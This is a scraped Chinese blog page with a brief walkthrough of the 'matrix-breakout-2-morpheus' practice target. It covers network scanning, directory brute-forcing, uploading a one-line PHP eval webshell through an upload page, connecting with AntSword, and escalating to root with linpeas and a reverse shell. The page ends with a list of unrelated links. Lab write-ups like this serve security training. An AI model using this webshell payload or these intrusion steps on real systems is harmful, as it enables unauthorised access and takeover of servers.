当前位置: 首页 > news >正文

matrix-breakout-2-morpheus 靶场 练习思路

news 2025/8/10 14:14:42 
arp-scan -l   获取目标机器的IP
nmap -sV -A IP   查看目标机器开放的端口
gobuster dir -u http://192.168.29.130 -x php,txt,jsp,asp -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  爆破目标机器的文件目录,找到可以访问的文件路径
http://192.168.29.130/graffiti.php 发现可以上传文件的页面以及接口

<?php eval($_POST['attack']);?>  通过上传文件的方式,注入该代码

然后使用 蚁剑 连接到目标服务器, 查看目标服务器的目录

传递linpeas.sh 和 反弹shell 到目标机器

执行linpeas.sh 文件,查看目标机器的漏洞

利用漏洞获取目标机器的root最高权限

http://www.lryc.cn/news/275549.html

相关文章:

  • 【Flutter 开发实战】Dart 基础篇:从了解背景开始
  • 西电期末1017.有序序列插值
  • day10 用栈实现队列 用队列实现栈
  • 解决跨域问题(SpringBoot)
  • LeetCode——2487. 从链表中移除节点
  • 云原生和Kubernetes如何简化应用程序开发
  • 点云从入门到精通技术详解100篇-基于深度学习的室内场景三维点云语义分割(续)
  • RabbitMQ消息可靠性保证机制3--消费端ACK机制
  • Copilot在Pycharm的应用和示例
  • 搜维尔科技:【简报】第九届元宇宙数字人设计大赛,报名已经进入白热化阶段!
  • 性能检测自动化(含内存泄露检测)
  • iec104和iec61850
  • redis 面试问题 (更新中 ing)
  • 力扣(leetcode)第389题找不同(Python)
  • Linux_源码编译安装LAMP
  • 静态网页设计——清雅古筝网(HTML+CSS+JavaScript)
  • 实战Flink Java api消费kafka实时数据落盘HDFS
  • 爬虫与反爬-localStorage指纹(某易某盾滑块指纹检测)(Hook案例)
  • 聊一聊 webpack 和 vite 的开发服务代理的问题
  • 【鸿蒙4.0】安装DevEcoStudio
  • [概率论]四小时不挂猴博士
  • 算法通关村第二十关-黄金挑战图的常见算法
  • 服务器内存不足怎么办?会有什么影响?
  • GPT实战系列-简单聊聊LangChain
  • 【读书笔记】《白帽子讲web安全》浏览器安全
  • 海外服务器2核2G/4G/8G和4核8G配置16M公网带宽优惠价格表
  • Linux 编译安装 Nginx
  • Oracle文件自动“减肥”记
  • 【csharp】抽象类与接口有哪些不同?什么时候应该使用抽象类?
  • 最新-mybatis-plus 3.5分页插件配置